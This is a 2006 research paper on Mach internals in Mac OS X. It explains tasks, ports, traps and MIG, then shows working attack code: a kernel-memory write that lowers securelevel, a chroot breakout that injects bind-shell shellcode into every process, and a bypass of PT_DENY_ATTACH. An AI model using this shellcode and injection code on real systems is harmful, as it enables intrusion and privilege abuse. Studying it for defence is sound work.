Abusing Mach on Mac OS X May, 2006 nemo nemo@felinemenace.org 1) Foreword Abstract: This paper discusses the security implications of Mach being integrated with the Mac OS X kernel. A few examples are used to illustrate how Mach support can be used to bypass some of the BSD security features, such as securelevel. Furthermore, examples are given that show how Mach functions can be used to supplement the limited ptrace functionality included in Mac OS X. Hello reader. I am writing this paper for two reasons. The first reason is to provide some documentation on the Mach side of Mac OS X for people who are unfamiliar with this and interested in looking into it. The second reason is to document my own research, as I am fairly inexperienced with Mach programming. Because of this fact, this paper may contain errors. If this is the case, please email me at nemo@felinemenace.org and I will try to correct it. 2) Introduction This paper will try to provide a basic introduction to the Mach kernel including its history and general design. From there, details will be provided about how these concepts are implemented on Mac OS X. Finally, this paper will illustrate some of the security concerns which arise when trying to mix UNIX and Mach together. In this vein, I came across an interesting quote from the Apple(.com) website [2]. ``You can send messages to this port to start and stop the task, kill the task, manipulate the tasks address space, and so forth. Therefore, whoever owns a send right for a tasks port effectively owns the task and can manipulate the tasks state without regard to BSD security policies or any higher-level security policies.'' ``In other words, an expert in Mach programming with local administrator access to a Mac OS X machine can bypass BSD and higher-level security features.'' Sounds like a valid model on which to build a server platform to me... 3) History of Mach The Mach kernel began its life at the Carnegie Mellon University (CMU) [1] and was originally based off an operating system named ``Accent''. It was initially built inside the 4.2BSD kernel. As each of the Mach components were written, the equivilant BSD component was removed and replaced. Because of this fact, early versions of Mach were monolithic kernels, similar to xnu, with BSD code and Mach combined. Mach was predominantly designed around the need for multi-processor support. It was also designed as a Micro-kernel, however xnu, the implementation used by Mac OS X, is not a micro-kernel. This is due to the fact that the BSD code, as well as other subsystems, are included in the kernel. 4) Basic Concepts This section will run over some of the high level concepts associated with Mach. These concepts have been documented repeatedly by various people who are vastly more talented at writing than I am. For that reason, I advise you to follow some of the links provided in the references section of this paper. Mach uses various abstractions to represent the components of the system. These abstractions can be confusing for someone with a UNIX background so I'll define them now. 4.1) Tasks A task is a logical representation of an execution environment. Tasks are used in order to divide system resources between each running program. Each task has its own virtual address space and privilege level. Each task contains one or more threads. The tasks address space and resources are shared between each of its threads. On Mac OS X, new tasks can be created using either the task_create() function or the fork() BSD syscall. 4.2) Threads In Mach, a thread is an independent execution entity. Each thread has its own registers and scheduling policies. Each thread has access to all the elements within the task it is contained within. On Mac OS X, a list of all the threads in a task can be obtained using the task_threads() function shown below. kern_return_t task_threads (task_t task, thread_act_port_array_t thread_list, mach_msg_type_number_t* thread_count); The Mach API on Mac OS X provides a variety of functions for dealing with threads. Through this API, new threads can easily be created, register contents can be modified and retrieved, and so on. 4.3) Msgs Messages are used in Mach in order to provide communicate between threads. A message is made up of a collection of data objects. Once a message is created it is sent to a port for which the invoking task has the appropriate port rights. Port rights can be sent between tasks as a message. Messages are queued at the destination and processed at the liberty of the receiving thread. On Mac OS X, the mach_msg() function be used to send and receive messages to and from a port. The declaration for this function is shown below. mach_msg_return_t mach_msg (mach_msg_header_t msg, mach_msg_option_t option, mach_msg_size_t send_size, mach_msg_size_t receive_limit, mach_port_t receive_name, mach_msg_timeout_t timeout, mach_port_t notify); 4.4) Ports A port is a kernel controlled communication channel. It provides the ability to pass messages between threads. A thread with the appropriate port rights for a port is able to send messages to it. Multiple ports which have the appropriate port rights are able to send messages to a single port concurrently. However, only a single task may receive messages from a single port at any given time. Each port has an associated message queue. 4.5) Port Set A port set is (unsurprisingly) a collection of Mach ports. Each of the ports in a port set use the same queue of messages. 5) Mach Traps (system calls) In order to combine Mach and BSD into one kernel (xnu), syscall numbers are divided into different tables. On a PowerPC system, when the ``sc'' instruction is executed, the syscall number is stored in r0 and used to determine which syscall to execute. Positive syscall numbers (smaller than 0x6000) are treated as FreeBSD syscalls. In this case the sysent table is offset and the appropriate function pointer is used. In cases where the syscall number is greater than 0x6000, PPC specific syscalls are used and the ``PPCcalls'' table is offset. However, in the case of a negative syscall number, the mach_trap_table is indexed and used. The code below is taken from the xnu source and shows this process. oris r15,r15,SAVsyscall >> 16 ; Mark that it this is a ; syscall cmplwi r10,0x6000 ; Is it the special ppc-only ; guy? stw r15,SAVflags(r30) ; Save syscall marker beq-- cr6,exitFromVM ; It is time to exit from ; alternate context... beq-- ppcscall ; Call the ppc-only system ; call handler... mr. r0,r0 ; What kind is it? mtmsr r11 ; Enable interruptions blt-- .L_kernel_syscall ; System call number if ; negative, this is a mach call... lwz r8,ACT_TASK(r13) ; Get our task cmpwi cr0,r0,0x7FFA ; Special blue box call? beq-- .L_notify_interrupt_syscall ; Yeah, call it... On an Intel system, things are a little different. The ``int 0x81'' (cd 81) instruction is used to call Mach traps. The ``sysenter'' instruction is used for the BSD syscalls. However, the syscall number convention remains the same. The eax register is used to store the syscall number in either case. It seems that most people developing shellcode on Mac OS X stick to using the FreeBSD syscalls. This may be due to lack of familiarity with Mach traps, so hopefully this paper is useful in re-mediating that. I have extracted a list of the Mach traps in the mach_trap_table from the xnu kernel. (792.6.22). 5.1) List of mach traps in xnu-792.6.22 /* 26 */ mach_reply_port /* 27 */ thread_self_trap /* 28 */ task_self_trap /* 29 */ host_self_trap /* 31 */ mach_msg_trap /* 32 */ mach_msg_overwrite_trap /* 33 */ semaphore_signal_trap /* 34 */ semaphore_signal_all_trap /* 35 */ semaphore_signal_thread_trap /* 36 */ semaphore_wait_trap /* 37 */ semaphore_wait_signal_trap /* 38 */ semaphore_timedwait_trap /* 39 */ semaphore_timedwait_signal_trap /* 41 */ init_process /* 43 */ map_fd /* 45 */ task_for_pid /* 46 */ pid_for_task /* 48 */ macx_swapon /* 49 */ macx_swapoff /* 51 */ macx_triggers /* 52 */ macx_backing_store_suspend /* 53 */ macx_backing_store_recovery /* 59 */ swtch_pri /* 60 */ swtch /* 61 */ thread_switch /* 62 */ clock_sleep_trap /* 89 */ mach_timebase_info_trap /* 90 */ mach_wait_until_trap /* 91 */ mk_timer_create_trap /* 92 */ mk_timer_destroy_trap /* 93 */ mk_timer_arm_trap /* 94 */ mk_timer_cancel_trap /* 95 */ mk_timebase_info_trap /* 100 */ iokit_user_client_trap When executing one of these traps the number on the left hand side (multiplied by -1) must be placed into the eax register. (intel) Each of the arguments must be pushed to the stack in reverse order. Although I could go into a low level description of how to send a mach msg here, the paper in the references has already done this and the author is a lot better at it than me. I strongly suggest reading this paper if you are at all interested in the subject matter. 6) MIG Due to the fact that Mach was designed as a micro-kernel and designed to function across multiple processors and machines, a large portion of the functionality is implemented by sending messages between tasks. In order to facilitate this process, IPC interfaces must be defined to provide the added functionality. To achieve this, Mach (and Apple) use a language called "Mach Interface Generator" (MIG). MIG is a subset of the Matchmaker language, which generates C or C++ interfaces for sending messages between tasks. When using MIG, files with the extension ".defs" are written containing a description of the interface. These files are compiled into a .c/.cpp file and a .h header file. This is done using the /usr/bin/mig tool on Mac OS X. These generated files contain the appropriate C or C++ stub code in order to handle the messages defined in the defs file. This can be confusing for someone from a UNIX or Windows background who is new to Mach/Mac OS X. Many of the Mach functions discussed in this paper are actually implemented as a .defs file. These files are shipped with the xnu source (which is no longer available). An example from one of these files (osfmk/mach/mach_vm.defs) showing the definition of the vm_allocate() function is provided below. /* * Allocate zero-filled memory in the address space * of the target task, either at the specified address, * or wherever space can be found (controlled by flags), * of the specified size. The address at which the * allocation actually took place is returned. */ #if !defined(_MACH_VM_PUBLISH_AS_LOCAL_) routine mach_vm_allocate( #else routine vm_allocate( #endif target : vm_task_entry_t; inout address : mach_vm_address_t; size : mach_vm_size_t; flags : int); It's useful to compile these .defs files with the /usr/bin/mig tool and then read the generated c code to work out what should be done when writing shellcode with the mach_msg mach trap. For more information on MIG check out [6]. Also, Richard Draves did a talk on MIG, his slides are available from [7]. 7) Replacing ptrace() A lot of people seem to move to Mac OS X from a Linux or BSD background and therefore expect the ptrace() syscall to be useful. However, unfortunately, this isn't the case on Mac OSX. For some ungodly reason, Apple decided to leave ptrace() incomplete and unable to do much more than take a feeble attempt at an anti-debug mechanism or single step the process. As it turns out, the anti-debug mechanism (PT_DENY_ATTACH) only stops future ptrace() calls from attaching to the process. Since ptrace() functionality is highly limited on Mac OS X anyway, and task_for_pid() is unrestricted, this basically has no purpose. In this section I will run through the missing features from a /real/ implementation of ptrace and show you how to implement them on Mac OS X. The first and most useful thing we'll look at is how to get a port for a task. Assuming you have sufficient privileges to do so, you can call the task_for_pid() function providing a unix process id and you will receive a port for that task. This function is pretty straightforward to use and works as you'd expect. pid_t pid; task_t port; task_for_pid(mach_task_self(), pid, &port); After this call, if sufficient privileges were held, a port will be returned in ``port''. This can then be used with later API function calls in order to manipulate the target tasks resources. This is pretty similar conceptually to the ptrace() PTRACE_ATTACH functionality. One of the most noticeable changes to ptrace() on Mac OS X is the fact that it is no longer possible to retrieve register state as you would expect. Typically, the ptrace() commands PTRACE_GETREGS and PTRACE_GETFPREGS would be used to get register contents. Fortunately this can be achieved quite easily using the Mach API. The task_threads() function can be used with a port in order to get a list of the threads in the task. thread_act_port_array_t thread_list; mach_msg_type_number_t thread_count; task_threads(port, &thread_list, &thread_count); Once you have a list of threads, you can then loop over them and retrieve register contents from each. This can be done using the thread_get_state() function. The code below shows the process involved for retrieving the register contents from a thread (in this case the first thread) of a thread_act_port_array_t list. NOTE: This code will only work on ppc machines, i396_thread_state_t type is used for intel. ppc_thread_state_t ppc_state; mach_msg_type_number_t sc = PPC_THREAD_STATE_COUNT; long thread = 0; // for first thread thread_get_state( thread_list[thread], PPC_THREAD_STATE, (thread_state_t)&ppc_state, &sc ); For PPC machines, you can then print out the registered contents for a desired register as so: printf(" lr: 0x%x\n",ppc_state.lr); Now that register contents can be retrieved, we'll look at changing them and updating the thread to use our new contents. This is similar to the ptrace PTRACE_SETREGS and PTRACE_SETFPREGS requests on Linux. We can use the mach call threadsetstate to do this. I have written some code to put these concepts together into a tiny sample program. The following small assembly code will continue to loop until the r3 register is nonzero. .globl _main _main: li r3,0 up: cmpwi cr7,r3,0 beq- cr7,up trap The C code below attaches to the process and modifies the value of the r3 register to 0xdeadbeef. /* * This sample code retrieves the old value of the * r3 register and sets it to 0xdeadbeef. * * - nemo * */ #include #include #include #include #include void error(char *msg) { printf("[!] error: %s.\n",msg); exit(1); } int main(int ac, char **av) { ppc_thread_state_t ppc_state; mach_msg_type_number_t sc = PPC_THREAD_STATE_COUNT; long thread = 0; // for first thread thread_act_port_array_t thread_list; mach_msg_type_number_t thread_count; task_t port; pid_t pid; if(ac != 2) { printf("usage: %s \n",av[0]); exit(1); } pid = atoi(av[1]); if(task_for_pid(mach_task_self(), pid, &port)) error("cannot get port"); // better shut down the task while we do this. if(task_suspend(port)) error("suspending the task"); if(task_threads(port, &thread_list, &thread_count)) error("cannot get list of tasks"); if(thread_get_state( thread_list[thread], PPC_THREAD_STATE, (thread_state_t)&ppc_state, &sc )) error("getting state from thread"); printf("old r3: 0x%x\n",ppc_state.r3); ppc_state.r3 = 0xdeadbeef; if(thread_set_state( thread_list[thread], PPC_THREAD_STATE, (thread_state_t)&ppc_state, sc )) error("setting state"); if(task_resume(port)) error("cannot resume the task"); return 0; } A sample run of these two programs is as follows: -[nemo@gir:~/code]$ ./tst& [1] 5302 -[nemo@gir:~/code]$ gcc chgr3.c -o chgr3 -[nemo@gir:~/code]$ ./chgr3 5302 old r3: 0x0 -[nemo@gir:~/code]$ [1]+ Trace/BPT trap ./tst As you can see, when the C code is run, ./tst has it's r3 register modified and the loop exits, hitting the trap. Some other features which have been removed from the ptrace() call on Mac OS X are the ability to read and write memory. Again, we can achieve this functionality using Mach API calls. The functions vm_write() and vm_read() (as expected) can be used to write and read the address space of a target task. These calls work pretty much how you would expect. However there are examples throughout the rest of this paper which use these functions. The functions are defined as follows: kern_return_t vm_read (vm_task_t target_task, vm_address_t address, vm_size_t size, size data_out, target_task data_count); kern_return_t vm_write (vm_task_t target_task, vm_address_t address, pointer_t data, mach_msg_type_number_t data_count); These functions provide similar functionality to the ptrace requests: PTRACE_POKETEXT, PTRACE_POKEDATA and PTRACE_POKEUSR. The memory being read/written must have the appropriate protection in order for these functions to work correctly. However, it is quite easy to set the protection attributes for the memory before the read or write takes place. To do this, the vm_protect() API call can be used. kern_return_t vm_protect (vm_task_t target_task, vm_address_t address, vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); The ptrace() syscall on Linux also provides a way to step a process up to the point where a syscall is executed. The PTRACE_SYSCALL request is used for this. This functionality is useful for applications such as "strace" to be able to keep track of system calls made by an application. Unfortunately, this feature does not exist on Mac OS X. The Mach api provides a very useful function which would provide this functionality. kern_return_t task_set_emulation (task_t task, vm_address_t routine_entry_pt, int syscall_number); This function would allow you to set up a userspace handler for a syscall and log it's execution. However, this function has not been implemented on Mac OS X. 8) Code injection The concept of using the Mach API in order to inject code into another task has been demonstrated numerous times. The most well known implementation is named machinject. This code uses task_for_pid() to get a port for the chosen pid. The threadcreaterunning() function is used to create a thread in the task and set the register state. In this way control of execution is gained. This code has been rewritten using the same method for the intel platform. It's also pretty easy to set the thread starting state to point to the dlopen() function and load a dylib from disk. Or even vm_map() an object file into the process space by hand and fix up relocations yourself. 9) Moving into the kernel Since Mac OS X 10.4.6 on intel systems (the latest release of Mac OSX at the time of writing this paper) both /dev/kmem and /dev/mem have been removed. Because of this fact, a new method for entering and manipulating the kernel memory is needed. Luckily, Mach provides a solution. By using the task_for_pid() mach trap and passing in pid=0 the kernel machportt port is available. Obviously, root privileges are required in order to do so. Once this port is acquired, you are able to read and write directly to the kernel memory using the vm_read() and vm_write() functions. You can also vm_map() or vm_remap() files and mappings directly into kernel memory. I am using this functionality for a new version of the WeaponX rootkit, but there are plenty other reasons why this is useful. 10) Security considerations of a UNIX / Mach hybrid Many problems arise when both UNIX and Mach aspects are provided on the same system. As the quote from the Apple Security page says (mentioned in the introduction). A good Mach programmer will be able to bypass high level BSD security functionality by using the Mach API/Mach Traps on Mac OS X. In this section I will run through a couple of examples of situations where BSD security can be bypassed. There are many more cases like this. I'll leave it up to you (the reader) to find more. The first bypass which we will look at is the "kern.securelevel" sysctl. This sysctl is used to restrict various functionality from the root user. When this sysctl is set to -1, the restrictions are non-existent. Under normal circumstances the root user should be able to raise the securelevel however lowering the securelevel should be restricted. Here is a demonstration of this: -[root@fry:~]$ id uid=0(root) gid=0(wheel) -[root@fry:~]$ sysctl -a | grep securelevel kern.securelevel = 1 -[root@fry:~]$ sysctl -w kern.securelevel=-1 kern.securelevel: Operation not permitted -[root@fry:~]$ sysctl -w kern.securelevel=2 kern.securelevel: 1 -> 2 -[root@fry:~]$ sysctl -w kern.securelevel=1 kern.securelevel: Operation not permitted As you can see, modification of this sysctl works as described above. However! Due to the fact that we can task_for_pid() pid=0 and write to kernel memory, we can bypass this. In order to do this, we simply get the address of the variable in kernel- space which stores the securelevel. To do this we can use the `nm' tool. -[root@fry:~]$ nm /mach_kernel | grep securelevel 004bcf00 S _securelevel We can then use this value by calling task_for_pid() to get the kernel task port, and calling vm_write() to write to this address. The code below does this. Here is an example of this code being used. -[root@fry:~]$ sysctl -a | grep securelevel kern.securelevel = 1 -[root@fry:~]$ ./slevel -1 [+] done! -[root@fry:~]$ sysctl -a | grep securelevel kern.securelevel = -1 A kext could also be used for this. But this is neater and relevant. /* * [ slevel.c ] * nemo@felinemenace.org * 2006 * * Tools to set the securelevel on * Mac OSX Build 8I1119 (10.4.6 intel). */ #include #include #include #include // -[nemo@fry:~]$ nm /mach_kernel | grep securelevel // 004bcf00 S _securelevel #define SECURELEVELADDR 0x004bcf00 void error(char *msg) { printf("[!] error: %s\n",msg); exit(1); } void usage(char *progname) { printf("[+] usage: %s \n",progname); exit(1); } int main(int ac, char **av) { mach_port_t kernel_task; kern_return_t err; long value = 0; if(ac != 2) usage(*av); if(getuid() && geteuid()) error("requires root."); value = atoi(av[1]); err = task_for_pid(mach_task_self(),0,&kernel_task); if ((err != KERN_SUCCESS) || !MACH_PORT_VALID(kernel_task)) error("getting kernel task."); // Write values to stack. if(vm_write(kernel_task, (vm_address_t) SECURELEVELADDR, (vm_address_t)&value, sizeof(value))) error("writing argument to dlopen."); printf("[+] done!\n"); return 0; } The chroot() call is a UNIX mechanism which is often (mis)used for security purposes. This can also be bypassed using the Mach API/functionality. A process running on Mac OSX within a chroot() is able to attach to any process outside using the task_for_pid() Mach trap. Although neither of these problems are significant, they are an indication of some of the ways that UNIX functionality can be bypassed using the Mach API. The code below simply loops through all pids from 1 upwards and attempts to inject a small code stub into a new thread. It is written for PowerPC architecture. I have also included some shellcode for intel arch in case anyone has the need to use it in these circumstances. /* * sample code to break chroot() on osx * - nemo * * This code is a PoC and by so, is pretty harsh * I just trap in any process which isn't desirable. * DO NOT RUN ON A PRODUCTION BOX (or if you do, email * me the results so I can laugh at you) */ #include #include #include #include #include #include #include #include #include #define STACK_SIZE 0x6000 #define MAXPID 0x6000 char ppc_probe[] = // stat code "\x38\x00\x00\xbc\x7c\x24\x0b\x78\x38\x84\xff\x9c\x7c\xc6\x32" "\x79\x40\x82\xff\xf1\x7c\x68\x02\xa6\x38\x63\x00\x18\x90\xc3" "\x00\x0c\x44\x00\x00\x02\x7f\xe0\x00\x08\x48\x00\x00\x14" "/mach_kernelAAAA" // bindshell from metasploit. Port 4444 "\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00" "\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00" "\x00\x0d\x00\x02\x11\x5c\x00\x00\x00\x00\x7c\x88\x02\xa6\x38" "\xa0\x00\x10\x38\x00\x00\x68\x7f\xc3\xf3\x78\x44\x00\x00\x02" "\x7c\x00\x02\x78\x38\x00\x00\x6a\x7f\xc3\xf3\x78\x44\x00\x00" "\x02\x7c\x00\x02\x78\x7f\xc3\xf3\x78\x38\x00\x00\x1e\x38\x80" "\x00\x10\x90\x81\xff\xe8\x38\xa1\xff\xe8\x38\x81\xff\xf0\x44" "\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x38\xa0\x00\x02" "\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00" "\x02\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82" "\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c" "\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x28" "\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00" "\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x7c\x00\x02\x78\x7f\xe0" "\x00\x08\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x00\x00\x00"; unsigned char x86_probe[] = // stat code, cheq for /mach_kernel. Makes sure we're outside // the chroot. "\x31\xc0\x50\x68\x72\x6e\x65\x6c\x68\x68\x5f\x6b\x65\x68\x2f" "\x6d\x61\x63\x89\xe3\x53\x53\xb0\xbc\x68\x7f\x00\x00\x00\xcd" "\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80\x90\x90\x90\x90\x90" // bindshell - 89 bytes - port 4444 // based off metasploit freebsd code. "\x6a\x42\x58\xcd\x80\x6a\x61\x58\x99\x52\x68\x10\x02\x11\x5c" "\x89\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99\x93\x51\x53" "\x52\x6a\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0\x1e" "\xcd\x80\x97\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49" "\x0f\x89\xf1\xff\xff\xff\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" "\x69\x6e\x89\xe3\x50\x54\x54\x53\x53\xb0\x3b\xcd\x80"; int injectppc(pid_t pid,char *sc,unsigned int size) { kern_return_t ret; mach_port_t mytask; vm_address_t stack; ppc_thread_state_t ppc_state; thread_act_t thread; long blr = 0x7fe00008; if ((ret = task_for_pid(mach_task_self(), pid, &mytask))) return -1; // Allocate room for stack and shellcode. if(vm_allocate(mytask, &stack, STACK_SIZE, TRUE) != KERN_SUCCESS) return -1; // Write in our shellcode if(vm_write(mytask, (vm_address_t)((stack + 650)&~2), (vm_address_t)sc, size)) return -1; if(vm_write(mytask, (vm_address_t) stack + 960, (vm_address_t)&blr, sizeof(blr))) return -1; // Just in case. if(vm_protect(mytask,(vm_address_t) stack, STACK_SIZE, VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE,VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE)) return -1; memset(&ppc_state,0,sizeof(ppc_state)); ppc_state.srr0 = ((stack + 650)&~2); ppc_state.r1 = stack + STACK_SIZE - 100; ppc_state.lr = stack + 960; // terrible blr cpu usage but this // whole code is a hack so shutup!. if(thread_create_running(mytask, PPC_THREAD_STATE, (thread_state_t)&ppc_state, PPC_THREAD_STATE_COUNT, &thread) != KERN_SUCCESS) return -1; return 0; } int main(int ac, char **av) { pid_t pid; // (pid = 0) == kernel printf("[+] Breaking chroot() check for a non-chroot()ed shell on port 4444 (TCP).\n"); for(pid = 1; pid <= MAXPID ; pid++) injectppc(pid,ppc_probe,sizeof(ppc_probe)); return 0; } The output below shows a sample run of this code on a stock standard Mac OSX 10.4.6 Mac mini. As you can see, a non privilege user within the chroot() is able to attach to a process running at the same privilege level outside of the chroot(). Some shellcode can then be injected into the process to bind a shell. -[nemo@gir:~/code]$ gcc break.c -o break -[nemo@gir:~/code]$ cp break chroot/ -[nemo@gir:~/code]$ sudo chroot chroot/ -[root@gir:/]$ ./dropprivs An interesting note about this little ./dropprivs program is that I had to use seteuid()/setuid() separately rather than using the setreuid() function. It appears setreuid() and setregid() don't actually work at all. Andrewg summed this situation up nicely: best backdoor ever -[nemo@gir:/]$ ./break [+] Breaking chroot() check for a non-chroot()ed shell on port 4444 (TCP). -[nemo@gir:/]$ Illegal instruction -[root@gir:/]$ nc localhost 4444 ls -lsa /mach_kernel 8472 -rw-r--r-- 1 root wheel 4334508 Mar 27 14:27 /mach_kernel id; uid=501(nemo) gid=501(nemo) groups=501(nemo) Another method of breaking out from a chroot() environment would be to simply task_for_pid() pid 0 and write into kernel memory. However since this would require root privileges I didn't bother to implement it. This code could quite easily be implemented as shellcode. However, due to time constraints and lack of caring, I'll leave it up to you to do so. == ptrace As I mentioned in the ptrace section of this paper, the ptrace() syscall has been heavily bastardized and is pretty useless now. However, a new ptrace command PT_DENY_ATTACH has been implemented to enable a process to request that other processes will not be able to ptrace attach to it. The following sample code shows the use of this: #include #include #include static int changeme = 0; int main(int ac, char **av) { ptrace(PT_DENY_ATTACH, 0, 0, 0); while(1) { if(changeme) { printf("[+] hacked.\n"); exit(1); } } return 1; } This code does nothing but sit and spin while checking the status of a global variable which is never changed. As you can see below, if we try to attach to this process in gdb (which uses ptrace) our process will receive a SIGSEGV. (gdb) at hackme.25143 A program is being debugged already. Kill it? (y or n) y Attaching to program: `/Users/nemo/hackme', process 25143. Segmentation fault However we can use the Mach API, as mentioned earlier, and still attach to the process just fine. We can use the `nm' command in order to get the address of the static changeme variable. -[nemo@fry:~]$ nm hackme | grep changeme 0000202c b _changeme Then, using the following code, we task_for_pid() the process and modify the contents of this variable (as an example.) #include #include #include #include #include #include #include #define CHANGEMEADDR 0x202c void error(char *msg) { printf("[!] error: %s\n",msg); exit(1); } int main(int ac, char **av) { mach_port_t port; long content = 1; if(ac != 2) { printf("[+] usage: %s \n",av[0]); exit(1); } if(task_for_pid(mach_task_self(), atoi(av[1]), &port)) error("_|_"); if(vm_write(port, (vm_address_t) CHANGEMEADDR, (vm_address_t)&content, sizeof(content))) error("writing to process"); return 0; } As you can see below, this will result in the loop terminating as expected. -[nemo@fry:~]$ ./hackme [+] hacked. -[nemo@fry:~]$ 11) Conclusion Well you actually read all the way to the bottom of this paper! Hope it wasn't too boring. Things are changing a little on Mac OS X. The later releases (10.4.6) on Intel have new restrictions in place on the task_for_pid() function. These restrictions require you to be part of the "procmod" group or root in order to call the task_for_pid() mach trap. Luckily these restrictions are easily bypassable. There is also mixed discussion (gossip) about whether or not Mach will be completely removed from Mac OS X in future. I have no idea how true (or not) this is though. If you noticed any problems with the content, as I mentioned earlier, please email me at nemo@felinemenace.org and let me know. No pointless (unconstructive) criticism please though. Thanks to everyone at felinemenace and pulltheplug for your ongoing support and friendship. Also thanks to anyone who proof read this paper for me and to the uninformed team for giving me the opportunity to publish this. Bibliography [1] CMU. The Mach Project. http://www.cs.cmu.edu/afs/cs/project/mach/public/www/mach.html [2] Apple. Apple Security Overview. http://developer.apple.com/documentation/Security/Conceptual/Security_Overview/Concepts/chapter_3_section_9.html [3] Mach. Mach Man-pages. http://felinemenace.org/ nemo/mach/manpages [4] Rentzsch. Mach Inject. http://rentzsch.com/mach_inject/ [5] Guiheneuf. Mach Inject. http://guiheneuf.org/Site/mach [6] Richard P. Draves/Michael B. Jones and Mary R. Thompson. Mach Interface Generator. http://felinemenace.org/ nemo/mach/mig.txt [7] Richard P. Draves. MIG Slides. http://felinemenace.org/ nemo/mach/Slides [8] Wikipedia. Mach Kernel. http://en.wikipedia.org/wiki/Mach_kernel [9] Feline Menace. The Mach System. http://felinemenace.org/ nemo/mach/Mach.txt [10] OSX Code. Mach. http://www.osxcode.com/index.php?pagename=Articles&article=10 [11] CMU. A Programmer's Guide to the Mach System Calls. http://www.cs.cmu.edu/afs/cs/project/mach/public/www/doc/abstracts/machsys.html [12] CMU. A Programmer's Guide to the Mach User Environment. http://www.cs.cmu.edu/afs/cs/project/mach/public/www/doc/abstracts/machuse.html